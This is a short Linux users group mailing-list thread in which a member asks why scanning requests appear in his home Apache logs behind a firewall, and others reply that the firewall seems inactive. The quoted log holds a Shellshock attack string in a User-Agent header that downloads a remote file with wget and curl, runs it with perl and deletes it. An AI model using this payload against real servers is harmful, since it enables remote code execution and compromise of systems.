[lug] Apache requests (to webdav) behind firewall?!

Ralf Mattes rm at seid-online.de
Tue Nov 15 02:13:21 MST 2016


On Tue, Nov 15, 2016 at 01:07:30AM -0700, Lee Woodworth wrote:
> Is the firewall active and configured with the rules you are expecting?

The log really doesn't look like the firewall is working.

> How about a VPN or ssh port forwarding?

Neither vpn nor ssh port forwarding would result in Apache showing
external IPs in the logfile. The same goes for a malicious JavaScript.

 HTH Ralf Mattes

> The log entries look like typical external connections.
> 
> On 11/14/2016 10:00 PM, Bear Giles wrote:
> > ​I was looking for something else and was shocked to see there are requests
> > in my Apache logs on my home system - behind a firewall that isn't supposed
> > to be doing port forwarding!
> > 
> > ​164.132.201.51 - - [13/Nov/2016:08:47:56 -0700] "PROPFIND /webdav/
> > HTTP/1.1" 405 569 "-" "WEBDAV Client"
> > 212.92.127.143 - - [13/Nov/2016:09:10:45 -0700] "GET / HTTP/1.0" 200 3593
> > "-" "masscan/1.0 (https://github.com/robertdavidgraham/masscan)"
> > 23.247.72.43 - - [13/Nov/2016:11:35:42 -0700] "GET / HTTP/1.1" 200 3574 "-"
> > "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2;
> > .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC
> > 6.0)"
> > 164.132.201.51 - - [13/Nov/2016:12:39:32 -0700] "PROPFIND /webdav/
> > HTTP/1.1" 405 569 "-" "WEBDAV Client"
> > 212.92.127.29 - - [13/Nov/2016:14:21:52 -0700] "GET
> > /cgi-sys/defaultwebpage.cgi HTTP/1.0" 404 479 "-" "() { :; }; /bin/bash -c
> > \"wget -O /tmp/.nova.txt 93.158.203.136/style.css; curl -o /tmp/.nova.txt
> > 93.158.203.136/style.css; perl /tmp/.nova.txt; rm -rf /tmp/.nova.txt\""
> > 141.212.122.128 - - [13/Nov/2016:14:26:01 -0700] "GET /x HTTP/1.1" 400 0
> > "-" "Telesphoreo"
> > 192.99.144.140 - - [13/Nov/2016:14:54:49 -0700] "PROPFIND /webdav/
> > HTTP/1.1" 405 569 "-" "WEBDAV Client"
> > 
> > ​There are obviously probes - but how did they get into the system? Via
> > malicious javascript that's getting past my filters? Something else? The
> > 'wget' entry is particularly disturbing since it clearly recognizes that
> > I'm running Linux.​
> > 
> > 
> > 
> > _______________________________________________
> > Web Page:  http://lug.boulder.co.us
> > Mailing List: http://lists.lug.boulder.co.us/mailman/listinfo/lug
> > Join us on IRC: irc.hackingsociety.org port=6667 channel=#hackingsociety
> > 
> 
> _______________________________________________
> Web Page:  http://lug.boulder.co.us
> Mailing List: http://lists.lug.boulder.co.us/mailman/listinfo/lug
> Join us on IRC: irc.hackingsociety.org port=6667 channel=#hackingsociety


More information about the LUG mailing list